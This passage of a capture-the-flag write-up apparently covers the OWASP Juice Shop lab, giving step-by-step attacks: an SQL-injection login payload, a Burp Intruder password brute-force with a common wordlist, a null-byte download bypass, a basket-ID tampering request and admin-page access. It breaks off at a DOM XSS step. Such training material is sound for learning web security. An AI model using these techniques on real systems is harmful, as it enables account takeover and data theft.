http://10.10.122.116\n\t\tConnection: close\n\t\tReferer: http://10.10.122.116/\n\t\tCookie: io=XFm7soxYpXet9JAKAAAA; language=en; cookieconsent_status=dismiss;\n\t\t{\"email\":\"bender@juice-sh.op'--\",\"password\":\"edededededed\"}\n\t~~~\n\t- `fb***762a3c*******9320************d4066`\n\n- Bruteforce the Administrator account's password!\n\n\t- For the payload, we will be using the best1050.txt from Seclists. (Which can be installed via: `apt-get install seclists`)\n\t- You can load the list from `/usr/share/seclists/Passwords/Common-Credentials/best1050.txt`\n\t- Copy another new login request, right click and Send to Intruder.\n\t- Change the email to `admin@juice-sh.op`.\n\t- Clear all the `§` symbols and add them only to the password field.\n\t- Load the list into BurpSuite and Start the Attack.\n\t- See where request (into the results tab) has `200` as Status.\n\t- *Tips* On the above bar of results tab you can filter results hiding 3xx, 4xx, and 5xx response code.\n\t- `***10d06d*******7cd809************f1ac0e`\n\n- Reset Jim's password!\n\n\t- Logout\n\t- Reset Jim's password\n\t- `094fb***48e52*******7d05************7257`\n\n- Access the Confidential Document!\n\n\t- Navigate to the About Us page, and hover over the \"Check out our terms of use\".\n\t- The link is `something/ftp/legal.md`\n\t- The `/ftp/` folder is publicly exposed!\n\t- Download all the files in that folder.\n\t- Go to home and access the flag.\n\t- `edf9*812*******c5fee***************50c5b`\n\n- Log into MC SafeSearch's account!\n\n\t- `mc.safesearch@juice-sh.op`, `Mr. N00dles`\n\t- `66bd*ffad9e6*******003f************5d7f0`\n\n- Download the Backup file!\n\n\t- Add the poison NULL byte to the file you would like to download.\n\t- e.g. `http:/ftp/file.md.bak%2500.md`\n\t- `b**********579e85*06fee************13795`\n\n- Access the administration page!\n\n\t- Open the file `/main-es2015.js`.\n\t- You will find a path called `administration`.\n\t- 403\n\t- Log in as admin.\n\t- Go to `/administration` and grab the flag.\n\t- `946*79936********82200************6629a0`\n\n- View another user's shopping basket!\n\n\t- Click on `your Basket`. Capture the request with Burp.\n\t- Capture `GET /rest/basket/1 HTTP/1.1` request.\n\t- Change the number id from 1 to 2 and forward the request.\n\t- `41b9*7a36*******4f0ba************ce52121`\n\n- Remove all 5-star reviews!\n\n\t- Navigate to the `http://10.10.202.127/#/administration` page again and click the bin icon next to the review with 5 stars!\n\t- `50c97*cc*******446d61c************2266ef`\n\n- Perform a DOM XSS!\n\t\n\t- Input this into the search bar `